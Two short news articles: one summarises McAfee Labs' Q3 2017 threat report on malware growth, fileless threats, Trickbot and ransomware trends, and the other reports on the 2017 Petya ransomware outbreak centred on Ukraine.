McAfee Labs’ Threat Report for Q3 2017 identifies 57.6 million new malware samples – an increase of 10% from Q2

McAfee, one of the leading cybersecurity companies, released its Threat Report for December 2017. The report identifies the growth and trends of latest malware, ransomware and malicious cyber threats in Q3 2017.

According to the report statistics, new malware sample count in Q3 touched 57.6 million, which is an increase of 10% from Q2. With this, the total count in the McAfee Labs sample database has now reached more than 780 million. The potential reason behind this increase is the availability of exploit kits and dark web sources.

The third quarter revealed that attackers’ threat designs continue to benefit from the dynamic, benign capabilities of platform technologies like PowerShell, a reliable recklessness on the part of individual phishing victims, and what seems to be an equally reliable failure of organizations to patch known vulnerabilities with available security updates,” said Raj Samani, McAfee’s Chief Scientist.

Amongst industries, health and public sectors were the worst affected, accounting to more than 40% of the total incidents.

Source: McAfee Labs Threat Report, December 2017

Account hijacking followed by leaks, malware, DDoS were the top attack vectors.

Source: McAfee Labs Threat Report, December 2017

The total mobile malware was found to be increasing, reaching 2.1 million samples, with 60% increase in new mobile malware, probably due to Android screen-locking ransomware.

Source: McAfee Labs Threat Report, December 2017

The attackers are taking advantage of the known vulnerabilities, like CVE-2017-0199 vulnerability in Microsoft Office.

The report identified new variations of Trickbot banking Trojan which featured code that embedded the EternalBlue exploit. It was the exploit responsible behind massive WannaCry and NotPetya ransomware attacks in Q2.

Attackers, despite Microsoft’s security patches updates, were able to combine the known vulnerability with other features like cryptocurrency theft, making these Trickbot versions one of the most active banking trojans during Q3.

The year 2017 will be remembered as the time when such vulnerabilities were exploited to orchestrate large-scale cyber events, including the WannaCry and NotPetya ransomware outbreaks, and high-profile breaches such as at Equifax,” – said Steve Grobman, Chief Technology Officer at McAfee.

Fileless threats were also identified to be a growing concern in Q3, including high growth in PowerShell malware (up to 119%). Emotet banking trojan was one of the most prominent in Fileless threats.

In the ransomware space, Lukitus ransomware – a new version of Locky Ransomware, was distributed via more than 23 million spam emails within the first 24 hours of the attack.

The research team at McAfee also found that DragonFly 2.0 malware which was discovered in early 2017, has affected organizations that were not made public including pharmaceutical, accounting and financial services.

The actors involved in the DragonFly 2.0 attacks have a reputation for initiating attacks for the purpose of conducting reconnaissance on the inner workings of targeted sectors—with energy and pharmaceutical confirmed as top priorities,” said Christiaan Beek, McAfee Lead Scientist and Principal Engineer.

Find the complete report, here.



Increasing cyber-attacks – are we heading towards cyber doom?

The recent Petya ransomware tragedy that struck the computer systems worldwide, is the second largest cyber-attack after the WannaCry Ransomware that had hit the world last month.

The recent attack hit many countries, locking up the PCs and crippling enterprise-services. Ukraine and Russia were identified among the worst affected countries.

Based on the findings of security firm Kaspersky, the ransomware could possibly be a variant of Petya.D, Petya.A, or PetrWrap. Though it widely affected the systems just like WannaCry, but it is not its variant.

The Petya ransomware locks a computer’s files with a message and demands a ransom in lieu.

The attack reportedly started through an update that was used on a third-party Ukraine software, known as MeDoc. The software was used by many organizations in the country and is identified as the primary reason behind Ukraine being largely affected.

In Ukraine, government offices, banks, energy companies, cash machines, gas stations, railways, Chernobyl power and supermarkets, all were impacted.

Many multinationals like law firm DLA Piper, Mendelez International, Merck and shipping giant AP Moller-Maersk were also impacted.

Per Kaspersky, 60 percent of the attack hit in the Ukraine region while 30 percent was in Russia.

The ransomware reportedly used the EternalBlue Exploit – a software vulnerability in Microsoft’s Windows, just as in WannaCry attack. The tech giant had issued a security update for the same on March 14th – that is before the ransomware attack, and hence those who updated their systems were saved while others had to pay the cost.

The lack of proper security measures and failure to keep the systems updated are supposedly the major reasons behind the attacks.

Though the security agencies and cyber-police have not been able to find out the solution for decrypting the file, but have asked the users to be more aware of the ransomware and its effect.

The recent updates on the attack revealed that the attackers were hardly able to collect any ransom from the act. Some reports suggest that rather being a ransomware, it was a wiper whose primary aim was to cause destruction.

With global cyber-attacks that are crippling the backbone of many countries, one is left in doubt whether these are deliberate attacks of the cyber criminals to extort money or if there is some sinister ulterior motive behind all these attacks.